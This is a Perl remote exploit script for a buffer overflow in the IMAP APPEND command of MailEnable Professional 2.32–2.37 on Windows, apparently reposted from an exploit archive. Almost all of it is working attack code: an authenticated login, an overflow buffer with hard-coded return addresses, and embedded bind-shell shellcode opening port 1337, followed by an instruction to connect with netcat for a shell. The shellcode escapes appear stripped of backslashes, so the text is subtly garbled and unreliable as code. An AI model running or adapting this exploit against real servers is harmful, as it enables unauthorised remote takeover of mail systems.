
maildisable-v4.pl.txt

Posted on 06 March 2007

#!/usr/bin/perl # # maildisable-v4.pl # # Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit # by mu-b - Wed Nov 29 2006 # # - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX # Mail Enable Professional v2.33 (win32) # Mail Enable Professional v2.35 (win32) # Mail Enable Professional v2.37 (win32) # ######## use Getopt::Std; getopts('t:n:u:p:', \%arg); use Socket; # Fixed metasploit win32 bindshell port 1337 my $zshell_win32_bind = "x33xc9x83xe9xb0". "x81xc4xd0xfdxffxff". # add %esp, -560 "xd9xeexd9x74x24xf4x5bx81x73x13x1d". "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96". "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2". "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0". "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41". "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82". "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2". "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39". "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9". "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b". "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a". "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88". "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01". "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20". "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e". "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39". "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44". "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96". "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38". "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9". "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09". 
"x4ex33xe4x96xcdxccx32x69"; # ff e4 -> jmp %esp my @offsets = ( "x63x37x57x7c", # Win2K Server SP4 KERNEL32.dll "x38x07xd2x77", "xefxbexadxde" # DoS ); &print_header; my $target; my $offset; my $user; my $passwd; if (defined($arg{'t'})) { $target = $arg{'t'} } if (defined($arg{'n'})) { $offset = $arg{'n'} } if (defined($arg{'u'})) { $user = $arg{'u'} } if (defined($arg{'p'})) { $passwd = $arg{'p'} } if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { &usage; } if (!(defined($offset))) { $offset = 0; } if ($offset > $#offsets) { print("only ".($#offsets+1)." targets known!! "); exit(1); } else { $offset = $offsets[$offset]; } my $imapd_port = 143; my $send_delay = 2; my $NOP = 'A'; if (connect_host($target, $imapd_port)) { print("-> * Connected "); send(SOCKET, "1 LOGIN ".$user." ".$passwd." ", 0); sleep($send_delay); print("-> * Sending payload "); $buf = "2 APPEND "()"{". ($NOP x 128). "xefxbexadxde". $offset. "x01xa3x19x03". ($NOP x 8 ). $zshell_win32_bind. "} "; send(SOCKET, $buf, 0); sleep($send_delay); print("-> * Successfully sent payload! "); print("-> * nc ".$target." 1337 for shell... "); } sub print_header { print("MailEnable Pro v2.32-7 remote exploit "); print("by: <mu-b@digit-labs.org> "); } sub usage { print(qq(Usage: $0 -t <hostname> -t <hostname> : hostname to test -n <num> : return addy offset number -u <username> : username for login -p <password> : usernames password )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die("Error: $! "); $paddr = sockaddr_in($port, $iaddr) || die("Error: $! "); $proto = getprotobyname('tcp') || die("Error: $! "); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $! "); connect(SOCKET, $paddr) || die("Error: $! "); return(1338); }

 
